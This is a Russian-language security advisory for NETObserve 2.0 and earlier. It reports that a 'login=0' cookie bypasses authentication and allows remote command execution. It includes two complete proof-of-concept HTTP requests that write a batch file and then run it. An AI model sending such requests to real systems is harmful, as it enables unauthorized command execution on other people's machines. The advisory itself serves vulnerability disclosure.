Дата публикации: | 04.01.2004 |
Всего просмотров: | 1253 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Обход ограничений безопасности |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: |
NETObserve 1.x
NETObserve 2.x |
Уязвимые версии: NETObserve 2.0 и более ранние версии
Описание: Уязвимость обнаружена в NETObserve. Удаленный пользователь может выполнить произвольные команды на целевой системе. Удаленный пользователь может подключиться к целевой системе, используя специально обработанный HTTP заголовок, чтобы внедриться в административную сессию. Пример/Эксплоит: REQUEST #1: -------------------------------------------------------------------------- POST /sendeditfile HTTP/1.1 Accept: */* Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat? Content-Type: application/x-www-form-urlencoded Host: AnyHostWillDo Content-Length: 25 Cookie: login=0 newfiledata=cmd+%2Fc+calc -------------------------------------------------------------------------- REQUEST #2: -------------------------------------------------------------------------- GET /runfile=?C:\windows\win.bat? HTTP/1.1 Accept: */* Host: AnyHostWillDo Cookie: login=0 -------------------------------------------------------------------------- URL производителя: http://www.exploreanywhere.com/no-intro.php Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | NetObserve Security Bypass Vulnerability |